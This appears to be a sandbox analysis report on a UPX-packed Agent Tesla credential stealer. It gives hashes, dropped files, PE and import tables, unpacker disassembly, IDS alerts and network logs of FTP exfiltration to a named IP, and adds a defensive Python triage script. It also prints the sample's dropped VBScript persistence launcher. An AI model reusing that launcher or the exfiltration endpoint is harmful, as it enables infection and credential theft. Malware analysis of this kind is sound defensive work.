                                        Preview:EA06.......tj.R.G.M......Q...].cL..g.ZD.F....`..A..i......g..8N%?j...X.[.tX6..e.O.Q.,.,.M.6i%^.".L.39...1.Z.U.dN.k..j....K...3..Q)Pz..$..`...M...e..Q.....],...o]".V..F.jx......`...cL..Ff..Q..V.O..Tb.A.l).....D..k..=D.....N..Z=.....0........EF......}...Z.Q...v.a.M`.....f...../...p.....*......1.^ft.<....T@?2..S.p...-T.A..IL.Q"..h`...W....Z@.G....!.........j0p...C.S>}...A....Sy.2.G.......v...[...}n[4..5.M.?a..?..,&..........d8<...6.....$........?9C..hS......r9...)...iV.....l....U.9........G#.....+...W.q.N..G......m1.Ve.x.a5.K..M.@...p...w.m.Nnv.,.X.Q....G....0.&.W...b.0.Bt..M.8....(.8$ ....)..!.-...@....."..-.....(...]...v`#....pe....=.w}.K...8.U!.VrK..g-4..N.Y.H WK..E.h..d..'..!.:k@..h.Z}n.6.m...=R.B.M&4...._.lyY.^...[..=<.5..Ae.9..F5..~.. ..i....9...@.Cm......~.J.Kj...1A..g29,.U1...X.F.!..'.8..N.........&.J...[..i.*U.....3......J..y.....^......a...S....5....kuRm6.T.....3.N`t9.*U .Mi.:..[#.`#...y&.......c1.W@..L.)P.Uj...r.y..j5.x..K.I
                                        Process:C:\Users\user\AppData\Local\kinematical\outvaunts.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):157558
                                        Entropy (8bit):7.885376198745657
                                        Encrypted:false
                                        SSDEEP:3072:x03XsThZf8FQpNw6OaIh/5Auxz/0b5HC3nzlbMr9otOi0fVUjP5:+3cThd8qpNw6MhxPxz/GHC35MrA30ijx
                                        MD5:9959CFF26891326E51CD32D14824413E
                                        SHA1:BB05AB1A0338183E892FC48B26567127EFF8744F
                                        SHA-256:EA37FEB15778A8EBEE55CF94D8E7DCCED0EC2813AD1B8B48EB72D28625538865
                                        SHA-512:F8CC27113B351BA778C8CACB58FC9D629191B6AE0D8D3D837FBDCF3EB316CAA8E42E8D833651CFC485EF63D150C6AF22ACAE10E4FA893A859C082B95FAD35FD1
                                        Malicious:false
                                        Reputation:low
                                        Preview:EA06.......tj.R.G.M......Q...].cL..g.ZD.F....`..A..i......g..8N%?j...X.[.tX6..e.O.Q.,.,.M.6i%^.".L.39...1.Z.U.dN.k..j....K...3..Q)Pz..$..`...M...e..Q.....],...o]".V..F.jx......`...cL..Ff..Q..V.O..Tb.A.l).....D..k..=D.....N..Z=.....0........EF......}...Z.Q...v.a.M`.....f...../...p.....*......1.^ft.<....T@?2..S.p...-T.A..IL.Q"..h`...W....Z@.G....!.........j0p...C.S>}...A....Sy.2.G.......v...[...}n[4..5.M.?a..?..,&..........d8<...6.....$........?9C..hS......r9...)...iV.....l....U.9........G#.....+...W.q.N..G......m1.Ve.x.a5.K..M.@...p...w.m.Nnv.,.X.Q....G....0.&.W...b.0.Bt..M.8....(.8$ ....)..!.-...@....."..-.....(...]...v`#....pe....=.w}.K...8.U!.VrK..g-4..N.Y.H WK..E.h..d..'..!.:k@..h.Z}n.6.m...=R.B.M&4...._.lyY.^...[..=<.5..Ae.9..F5..~.. ..i....9...@.Cm......~.J.Kj...1A..g29,.U1...X.F.!..'.8..N.........&.J...[..i.*U.....3......J..y.....^......a...S....5....kuRm6.T.....3.N`t9.*U .Mi.:..[#.`#...y&.......c1.W@..L.)P.Uj...r.y..j5.x..K.I
                                        Process:C:\Users\user\Desktop\toIuQILmr1.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):157558
                                        Entropy (8bit):7.885376198745657
                                        Encrypted:false
                                        SSDEEP:3072:x03XsThZf8FQpNw6OaIh/5Auxz/0b5HC3nzlbMr9otOi0fVUjP5:+3cThd8qpNw6MhxPxz/GHC35MrA30ijx
                                        MD5:9959CFF26891326E51CD32D14824413E
                                        SHA1:BB05AB1A0338183E892FC48B26567127EFF8744F
                                        SHA-256:EA37FEB15778A8EBEE55CF94D8E7DCCED0EC2813AD1B8B48EB72D28625538865
                                        SHA-512:F8CC27113B351BA778C8CACB58FC9D629191B6AE0D8D3D837FBDCF3EB316CAA8E42E8D833651CFC485EF63D150C6AF22ACAE10E4FA893A859C082B95FAD35FD1
                                        Malicious:false
                                        Reputation:low
                                        Preview:EA06.......tj.R.G.M......Q...].cL..g.ZD.F....`..A..i......g..8N%?j...X.[.tX6..e.O.Q.,.,.M.6i%^.".L.39...1.Z.U.dN.k..j....K...3..Q)Pz..$..`...M...e..Q.....],...o]".V..F.jx......`...cL..Ff..Q..V.O..Tb.A.l).....D..k..=D.....N..Z=.....0........EF......}...Z.Q...v.a.M`.....f...../...p.....*......1.^ft.<....T@?2..S.p...-T.A..IL.Q"..h`...W....Z@.G....!.........j0p...C.S>}...A....Sy.2.G.......v...[...}n[4..5.M.?a..?..,&..........d8<...6.....$........?9C..hS......r9...)...iV.....l....U.9........G#.....+...W.q.N..G......m1.Ve.x.a5.K..M.@...p...w.m.Nnv.,.X.Q....G....0.&.W...b.0.Bt..M.8....(.8$ ....)..!.-...@....."..-.....(...]...v`#....pe....=.w}.K...8.U!.VrK..g-4..N.Y.H WK..E.h..d..'..!.:k@..h.Z}n.6.m...=R.B.M&4...._.lyY.^...[..=<.5..Ae.9..F5..~.. ..i....9...@.Cm......~.J.Kj...1A..g29,.U1...X.F.!..'.8..N.........&.J...[..i.*U.....3......J..y.....^......a...S....5....kuRm6.T.....3.N`t9.*U .Mi.:..[#.`#...y&.......c1.W@..L.)P.Uj...r.y..j5.x..K.I
                                        Process:C:\Users\user\Desktop\toIuQILmr1.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):245248
                                        Entropy (8bit):6.756730328929154
                                        Encrypted:false
                                        SSDEEP:6144:qV3Vtuudjjm+CMQfxZ4QkWyC9zENTiA7gGpRLo:qV3VtuTHfxZ4QkWyCBENTiygmRU
                                        MD5:BFE52729D63DC4E1D9D17CF71636FF77
                                        SHA1:451594448E8A3292016C5782EC4CD5474711C90A
                                        SHA-256:70ED8C3A103BB5402268EE205F24B77566C8CF12B7A38E9EE94FE2C844AB1835
                                        SHA-512:C3F303B7383A3A7528AF556BEFC939C227F6C5246BEB9B9FF3A5D97A537BB4D8C6DA6FC6A45FAEC5D1C8C2F489DCA788BDB792E2DC91DDA71149AB6234CB4B92
                                        Malicious:false
                                        Reputation:low
                                        Preview:.c.FUTFG26LQ..QQ.3DJKC1L.A85H9KFVTFG66LQGAQQO3DJKC1LWA85H9KF.TFG8)._G.X.n.E..be$>2.E:V,479f$WX">3a34oA1$k*_l..k.%V/#xYKM.6LQGAQQ.vDJ.B2L$.rSH9KFVTFG.6NPL@ZQO.GJKK1LWA85..HFVtFG6.OQGA.QO.DJKA1LSA85H9KFRTFG66LQGaUQO1DJKC1LUAx.H9[FVDFG66\QGQQQO3DJ[C1LWA85H9KFZ.EGy6LQG.RQ.6DJKC1LWA85H9KFVTFG66HQKAQQO3DJKC1LWA85H9KFVTFG66LQGAQQO3DJKC1LWA85H9KFVTFG6.LQOAQQO3DJKC1L_a85.9KFVTFG66LQi54);3DJ/.2LWa85H.HFVVFG66LQGAQQO3DJkC1,y3KG+9KF.QFG6.OQGGQQO.GJKC1LWA85H9KF.TF..D)=("QQC3DJKC5LWC85H.HFVTFG66LQGAQQ.3D.KC1LWA85H9KFVTFGv.OQGAQQ.3DJIC4L..:5 .JFUTFG76LWGAQQO3DJKC1LWA85H9KFVTFG66LQGAQQO3DJKC1LWA85H9KFK....o.<o[-4.l.$.O..+..@..Y.S.M"....\....l67..A.:x.._...C.YB8P.....s#:=Y)kBg6*.K.....m%...W!.>...O~./>......re....^3....G..(,\b61HY-..'054..4.PGAQQ.......>9soe:DXbF>.....sS)...5C1L3A85:9KF7TFGq6LQ(AQQ!3DJ5C1L)A85.9KF.TFG.6LQbAQQ"3DJoC1L)A85.DDI...E..QGAQQz..z..........p'.8.T....%...iA..LY. .tr..E.?..!d'Wd..VN5@OID5O[|6~...gTPBB41HRK|_...k.e..n..9.....;66LQGA.QO.DJK.L.A85.9.F..FG6..Q.A.Q..J
                                        Process:C:\Users\user\Desktop\toIuQILmr1.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                        Category:dropped
                                        Size (bytes):613376
                                        Entropy (8bit):7.93384893623813
                                        Encrypted:false
                                        SSDEEP:12288:AYV6MorX7qzuC3QHO9FQVHPF51jgcQxNAQ8d6dLOXsGdxpM8E:fBXu9HGaVHdkLO/LE
                                        MD5:9B46500828B338EB4CDA1D49BED1F791
                                        SHA1:FE2F2D5E222765E585A61F80C33B061F643E7107
                                        SHA-256:0502E71249410DBA419218374909428D7D53CCA90C3CFE8861B7F8EAE432A4B9
                                        SHA-512:5A6E39F1064F7A1DB77FE8AAB9DA039F9340630ECF1379EF28061D857908107CCC884389FDC064D13B5C80FABC417D5D4061A718465F0301E9494C8DB109E918
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 71%
• Antivirus: Virustotal, Detection: 76%
                                        Reputation:low
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L....'jg.........."......p..........p.... ........@.......................................@...@.......@.....................@...$.......@...................d.......................................T...H...........................................UPX0....................................UPX1.....p... ...d..................@....rsrc................h..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....
                                        Process:C:\Users\user\AppData\Local\kinematical\outvaunts.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):284
                                        Entropy (8bit):3.4284807182449275
                                        Encrypted:false
                                        SSDEEP:6:DMM8lfm3OOQdUfclo5ZsUEZ+lX1OlTlOKl2Mu4dnriIM8lfQVn:DsO+vNlzQ1IlO8mA2n
                                        MD5:7E06A16B75B165ED34229AC07A69F329
                                        SHA1:E6C5E24217F613B277B2186B6F9D36EFFB44D525
                                        SHA-256:FC77EF6C285E85FEE2F8C1B7F10E62F58B1100620208C51ED13659BE78FEBE6C
                                        SHA-512:74F856FD40C9947BEFE53116B1E54D6C73549D8E2451310DBF1FAD9207F609E881CE00B50D20349C73D7C936704FA56011EA154B2F71E99E61266D05E0C04CAA
                                        Malicious:true
                                        Reputation:low
Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.k.i.n.e.m.a.t.i.c.a.l.\.o.u.t.v.a.u.n.t.s...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...
Preview (same bytes decoded as UTF-16LE; the dots above are the null bytes):Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "C:\Users\alfons\AppData\Local\kinematical\outvaunts.exe", 1
Set WshShell = Nothing
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                        Entropy (8bit):7.93384893623813
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.39%
                                        • UPX compressed Win32 Executable (30571/9) 0.30%
                                        • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        File name:toIuQILmr1.exe
                                        File size:613'376 bytes
                                        MD5:9b46500828b338eb4cda1d49bed1f791
                                        SHA1:fe2f2d5e222765e585a61f80c33b061f643e7107
                                        SHA256:0502e71249410dba419218374909428d7d53cca90c3cfe8861b7f8eae432a4b9
                                        SHA512:5a6e39f1064f7a1db77fe8aab9da039f9340630ecf1379ef28061d857908107ccc884389fdc064d13b5c80fabc417d5d4061a718465f0301e9494c8db109e918
                                        SSDEEP:12288:AYV6MorX7qzuC3QHO9FQVHPF51jgcQxNAQ8d6dLOXsGdxpM8E:fBXu9HGaVHdkLO/LE
                                        TLSH:F9D422C21FD1DD77C16823B9D43A9D10241AB8B0CBE53B6E8259F12EF87AB46C81615F
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                                        Icon Hash:aaf3e3e3938382a0
                                        Entrypoint:0x518070
                                        Entrypoint Section:UPX1
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x676A279B [Tue Dec 24 03:16:43 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:5
                                        OS Version Minor:1
                                        File Version Major:5
                                        File Version Minor:1
                                        Subsystem Version Major:5
                                        Subsystem Version Minor:1
                                        Import Hash:fc6683d30d9f25244a50fd5357825e79
                                        Instruction
                                        pushad
                                        mov esi, 004C2000h
                                        lea edi, dword ptr [esi-000C1000h]
                                        push edi
                                        jmp 00007FC898CCB4FDh
                                        nop
                                        mov al, byte ptr [esi]
                                        inc esi
                                        mov byte ptr [edi], al
                                        inc edi
                                        add ebx, ebx
                                        jne 00007FC898CCB4F9h
                                        mov ebx, dword ptr [esi]
                                        sub esi, FFFFFFFCh
                                        adc ebx, ebx
                                        jc 00007FC898CCB4DFh
                                        mov eax, 00000001h
                                        add ebx, ebx
                                        jne 00007FC898CCB4F9h
                                        mov ebx, dword ptr [esi]
                                        sub esi, FFFFFFFCh
                                        adc ebx, ebx
                                        adc eax, eax
                                        add ebx, ebx
                                        jnc 00007FC898CCB4FDh
                                        jne 00007FC898CCB51Ah
                                        mov ebx, dword ptr [esi]
                                        sub esi, FFFFFFFCh
                                        adc ebx, ebx
                                        jc 00007FC898CCB511h
                                        dec eax
                                        add ebx, ebx
                                        jne 00007FC898CCB4F9h
                                        mov ebx, dword ptr [esi]
                                        sub esi, FFFFFFFCh
                                        adc ebx, ebx
                                        adc eax, eax
                                        jmp 00007FC898CCB4C6h
                                        add ebx, ebx
                                        jne 00007FC898CCB4F9h
                                        mov ebx, dword ptr [esi]
                                        sub esi, FFFFFFFCh
                                        adc ebx, ebx
                                        adc ecx, ecx
                                        jmp 00007FC898CCB544h
                                        xor ecx, ecx
                                        sub eax, 03h
                                        jc 00007FC898CCB503h
                                        shl eax, 08h
                                        mov al, byte ptr [esi]
                                        inc esi
                                        xor eax, FFFFFFFFh
                                        je 00007FC898CCB567h
                                        sar eax, 1
                                        mov ebp, eax
                                        jmp 00007FC898CCB4FDh
                                        add ebx, ebx
                                        jne 00007FC898CCB4F9h
                                        mov ebx, dword ptr [esi]
                                        sub esi, FFFFFFFCh
                                        adc ebx, ebx
                                        jc 00007FC898CCB4BEh
                                        inc ecx
                                        add ebx, ebx
                                        jne 00007FC898CCB4F9h
                                        mov ebx, dword ptr [esi]
                                        sub esi, FFFFFFFCh
                                        adc ebx, ebx
                                        jc 00007FC898CCB4B0h
                                        add ebx, ebx
                                        jne 00007FC898CCB4F9h
                                        mov ebx, dword ptr [esi]
                                        sub esi, FFFFFFFCh
                                        adc ebx, ebx
                                        adc ecx, ecx
                                        add ebx, ebx
                                        jnc 00007FC898CCB4E1h
                                        jne 00007FC898CCB4FBh
                                        mov ebx, dword ptr [esi]
                                        sub esi, FFFFFFFCh
                                        adc ebx, ebx
                                        jnc 00007FC898CCB4D6h
                                        add ecx, 02h
                                        cmp ebp, FFFFFB00h
                                        adc ecx, 02h
                                        lea edx, dword ptr [edi+ebp]
                                        cmp ebp, FFFFFFFCh
                                        jbe 00007FC898CCB500h
                                        mov al, byte ptr [edx]
                                        Programming Language:
                                        • [ASM] VS2013 build 21005
                                        • [ C ] VS2013 build 21005
                                        • [C++] VS2013 build 21005
                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
                                        • [ASM] VS2013 UPD5 build 40629
                                        • [RES] VS2013 build 21005
                                        • [LNK] VS2013 UPD5 build 40629
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x157f40 | 0x424 | .rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x119000 | 0x3ef40 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x158364 | 0xc | .rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x118254 | 0x48 | UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
UPX0 | 0x1000 | 0xc1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
UPX1 | 0xc2000 | 0x57000 | 0x56400 | cfc3cd84fc03765e36adf0b7090cd0ae | False | 0.9872905344202898 | data | 7.93533599344607 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x119000 | 0x40000 | 0x3f400 | 3fe839ffa19b095a47d1be628507494b | False | 0.9197751976284585 | data | 7.8778698054781655 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1195ac | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0x1196d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0x119804 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0x119930 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0x119c1c | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0x119d48 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0x11abf4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0x11b4a0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0x11ba0c | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0x11dfb8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0x11f064 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xce4a0 | 0x50 | data | English | Great Britain | 1.1375
RT_STRING | 0xce4f0 | 0x594 | data | English | Great Britain | 1.007703081232493
RT_STRING | 0xcea84 | 0x68a | data | English | Great Britain | 1.0065710872162486
RT_STRING | 0xcf110 | 0x490 | data | English | Great Britain | 1.009417808219178
RT_STRING | 0xcf5a0 | 0x5fc | data | English | Great Britain | 1.0071801566579635
RT_STRING | 0xcfb9c | 0x65c | data | English | Great Britain | 0.984029484029484
RT_STRING | 0xd01f8 | 0x466 | data | English | Great Britain | 0.9609236234458259
RT_STRING | 0xd0660 | 0x158 | COM executable for DOS | English | Great Britain | 1.0319767441860466
RT_RCDATA | 0x11f4d0 | 0x384d7 | data | | | 1.000351234741886
RT_GROUP_ICON | 0x1579ac | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x157a28 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x157a40 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x157a58 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x157a70 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x157b50 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
KERNEL32.DLL | LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
ADVAPI32.dll | GetAce
COMCTL32.dll | ImageList_Remove
COMDLG32.dll | GetOpenFileNameW
GDI32.dll | LineTo
IPHLPAPI.DLL | IcmpSendEcho
MPR.dll | WNetUseConnectionW
ole32.dll | CoGetObject
OLEAUT32.dll | VariantInit
PSAPI.DLL | GetProcessMemoryInfo
SHELL32.dll | DragFinish
USER32.dll | GetDC
USERENV.dll | LoadUserProfileW
UxTheme.dll | IsThemeActive
VERSION.dll | VerQueryValueW
WININET.dll | FtpOpenFileW
WINMM.dll | timeGetTime
WSOCK32.dll | connect
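The import table above has the shape a packer or loader stub leaves behind: KERNEL32 supplies only the primitives needed to map and fix up code at run time (LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc), and every other DLL contributes exactly one token import, so the real API surface is resolved dynamically. The resource table shows the matching half of the picture, a 0x384d7-byte RT_RCDATA blob with a ZLIB complexity of 1.0003, i.e. data that does not compress at all. The script below is an added example written for this page, not Joe Sandbox code and not parsed from the sample itself: the import and resource rows are copied from the tables above into constants, the definition of the complexity ratio (compressed size over raw size) is an assumption about what the table's last column reports, and the 0.99 and 4096-byte thresholds are the author's choices.

```python
import zlib
from typing import Dict, Iterable, List

# Constructed from the import and resource tables above; nothing here parses the PE itself.
SAMPLE_IMPORTS: Dict[str, List[str]] = {
    "KERNEL32.DLL": ["LoadLibraryA", "GetProcAddress", "VirtualProtect",
                     "VirtualAlloc", "VirtualFree", "ExitProcess"],
    "ADVAPI32.dll": ["GetAce"], "COMCTL32.dll": ["ImageList_Remove"],
    "COMDLG32.dll": ["GetOpenFileNameW"], "GDI32.dll": ["LineTo"],
    "IPHLPAPI.DLL": ["IcmpSendEcho"], "MPR.dll": ["WNetUseConnectionW"],
    "ole32.dll": ["CoGetObject"], "OLEAUT32.dll": ["VariantInit"],
    "PSAPI.DLL": ["GetProcessMemoryInfo"], "SHELL32.dll": ["DragFinish"],
    "USER32.dll": ["GetDC"], "USERENV.dll": ["LoadUserProfileW"],
    "UxTheme.dll": ["IsThemeActive"], "VERSION.dll": ["VerQueryValueW"],
    "WININET.dll": ["FtpOpenFileW"], "WINMM.dll": ["timeGetTime"],
    "WSOCK32.dll": ["connect"],
}
# (name, rva, size, type, zlib complexity) for a few rows of the resource table.
SAMPLE_RESOURCES = [
    ("RT_ICON", 0x11ba0c, 0x25a8, "Device independent bitmap graphic", 0.13858921161825727),
    ("RT_STRING", 0xce4f0, 0x594, "data", 1.007703081232493),
    ("RT_RCDATA", 0x11f4d0, 0x384d7, "data", 1.000351234741886),
    ("RT_GROUP_ICON", 0x157a28, 0x14, "data", 1.25),
    ("RT_MANIFEST", 0x157b50, 0x3ef, "ASCII text, with CRLF line terminators", 0.5074478649453823),
]

# The four calls a stub needs to map, fix up and run a payload it unpacks itself.
LOADER_PRIMITIVES = {"LoadLibraryA", "GetProcAddress", "VirtualProtect", "VirtualAlloc"}


def import_profile(imports: Dict[str, Iterable[str]]) -> dict:
    """Score an import table for the 'loader stub' shape: loader quartet in
    kernel32 plus one token import per dependency, few imports overall."""
    by_dll = {dll.lower(): set(funcs) for dll, funcs in imports.items()}
    k32 = by_dll.get("kernel32.dll", set())
    single = sum(1 for funcs in by_dll.values() if len(funcs) == 1)
    total = sum(len(funcs) for funcs in by_dll.values())
    has_loader = LOADER_PRIMITIVES <= k32
    return {
        "loader_primitives": has_loader,
        "single_import_dlls": single,
        "total_imports": total,
        # every DLL except kernel32 contributes a single import: the real API
        # surface is resolved at run time with GetProcAddress.
        "likely_packed": has_loader and single >= len(by_dll) - 1 and total < 64,
    }


def zlib_complexity(data: bytes) -> float:
    """Compressed/raw size ratio; assumed to be what the table's last column reports."""
    if not data:
        return 0.0
    return len(zlib.compress(data)) / len(data)


def opaque_resources(rows, min_size: int = 4096, threshold: float = 0.99) -> List[str]:
    """Large untyped resources that do not compress: encrypted or already
    compressed blobs, the usual container for an embedded script or next stage."""
    return [f"{name}@{rva:#x}" for name, rva, size, kind, cx in rows
            if kind == "data" and size >= min_size and cx >= threshold]
```

Run against the constants, `import_profile` reports the loader quartet present, 17 single-import DLLs out of 18, and 23 imports in total; `opaque_resources` returns only the RT_RCDATA entry at 0x11f4d0, which is the resource to carve and inspect first.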
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-11T05:51:02.044557+0100 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.5 | 49707 | 162.241.62.63 | 21 | TCP
2025-01-11T05:51:02.441601+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49713 | 162.241.62.63 | 33214 | TCP
2025-01-11T05:51:02.446904+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49713 | 162.241.62.63 | 33214 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 05:50:47.930877924 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
Jan 11, 2025 05:50:47.936566114 CET | 80 | 49704 | 208.95.112.1 | 192.168.2.5
Jan 11, 2025 05:50:47.936650991 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
Jan 11, 2025 05:50:47.940356970 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
Jan 11, 2025 05:50:47.945952892 CET | 80 | 49704 | 208.95.112.1 | 192.168.2.5
Jan 11, 2025 05:50:48.389733076 CET | 80 | 49704 | 208.95.112.1 | 192.168.2.5
Jan 11, 2025 05:50:48.434722900 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
Jan 11, 2025 05:50:49.328093052 CET | 49705 | 21 | 192.168.2.5 | 162.241.62.63
Jan 11, 2025 05:50:49.332957983 CET | 21 | 49705 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:50:49.333034039 CET | 49705 | 21 | 192.168.2.5 | 162.241.62.63
Jan 11, 2025 05:50:49.336819887 CET | 49705 | 21 | 192.168.2.5 | 162.241.62.63
Jan 11, 2025 05:50:49.343089104 CET | 21 | 49705 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:50:49.343146086 CET | 49705 | 21 | 192.168.2.5 | 162.241.62.63
Jan 11, 2025 05:50:59.627724886 CET | 49706 | 80 | 192.168.2.5 | 208.95.112.1
Jan 11, 2025 05:50:59.632642031 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.5
Jan 11, 2025 05:50:59.632709026 CET | 49706 | 80 | 192.168.2.5 | 208.95.112.1
Jan 11, 2025 05:50:59.632908106 CET | 49706 | 80 | 192.168.2.5 | 208.95.112.1
Jan 11, 2025 05:50:59.637643099 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.5
Jan 11, 2025 05:51:00.097754955 CET | 49704 | 80 | 192.168.2.5 | 208.95.112.1
Jan 11, 2025 05:51:00.103748083 CET | 80 | 49706 | 208.95.112.1 | 192.168.2.5
Jan 11, 2025 05:51:00.153556108 CET | 49706 | 80 | 192.168.2.5 | 208.95.112.1
Jan 11, 2025 05:51:00.753202915 CET | 49707 | 21 | 192.168.2.5 | 162.241.62.63
Jan 11, 2025 05:51:00.758207083 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:51:00.758282900 CET | 49707 | 21 | 192.168.2.5 | 162.241.62.63
Jan 11, 2025 05:51:01.263539076 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:51:01.263787031 CET | 49707 | 21 | 192.168.2.5 | 162.241.62.63
Jan 11, 2025 05:51:01.268522978 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:51:01.381006956 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5
Jan 11, 2025 05:51:01.381308079 CET | 49707 | 21 | 192.168.2.5 | 162.241.62.63
Jan 11, 2025 05:51:01.386058092 CET | 21 | 49707 | 162.241.62.63 | 192.168.2.5
